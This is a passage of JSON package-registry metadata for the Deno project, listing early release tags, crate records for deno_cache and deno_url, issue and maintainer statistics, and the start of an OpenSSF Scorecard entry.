v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-30T02:55:29.994Z","dependent_packages_count":5,"downloads":465506,"downloads_period":"total","dependent_repos_count":3,"rankings":{"downloads":7.267424469039785,"dependent_repos_count":11.516738357957733,"dependent_packages_count":6.221294675583082,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":5.306516864450109},"purl":"pkg:cargo/deno_cache","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_cache","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_cache","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_cache/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-29T03:03:41.777Z","issues_count":6626,"pull_requests_count":9646,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1532231.9017556966,"issues_closed_count":3798,"pull_requests_closed_count":8030,"pull_request_authors_count":580,"issue_authors_count":2473,"avg_comments_per_issue":2.50814971325083,"avg_comments_per_pull_request":0.7193655401202571,"merged_pull_requests_count":7012,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":666,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1405378.1057268723,"past_year_avg_time_to_close_pull_request":1323857.4606060607,"past_year_issues_closed_count":227,"past_year_pull_requests_closed_count":660,"past_year_pull_request_authors_count":184,"past_year_issue_authors_count":368,"past_year_avg_comments_per_issue":1.2477477477477477,"past_year_avg_comments_per_pull_request":1.1131447587354408,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":14,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_cache/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-08T06:57:37.484Z","updated_at":"2022-11-08T06:57:37.484Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:33.017Z","updated_at":"2023-07-18T22:41:33.017Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047586,"name":"deno_url","ecosystem":"cargo","description":"DEPRECATED: use deno_web instead","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":225,"first_release_published_at":"2021-03-12T20:56:32.388Z","latest_release_published_at":"2025-11-04T09:35:12.416Z","latest_release_number":"0.222.0","last_synced_at":"2026-09-07T22:58:21.453Z","created_at":"2022-04-12T10:01:42.871Z","updated_at":"2026-09-07T22:58:21.453Z","registry_url":"https://crates.io/crates/deno_url/","install_command":"cargo install deno_url","documentation_url":"https://docs.rs/deno_url/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-29T19:17:00.000Z","size":248743,"stargazers_count":108340,"open_issues_count":1540,"forks_count":6359,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-29T21:56:41.390Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-29T20:05:41.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a 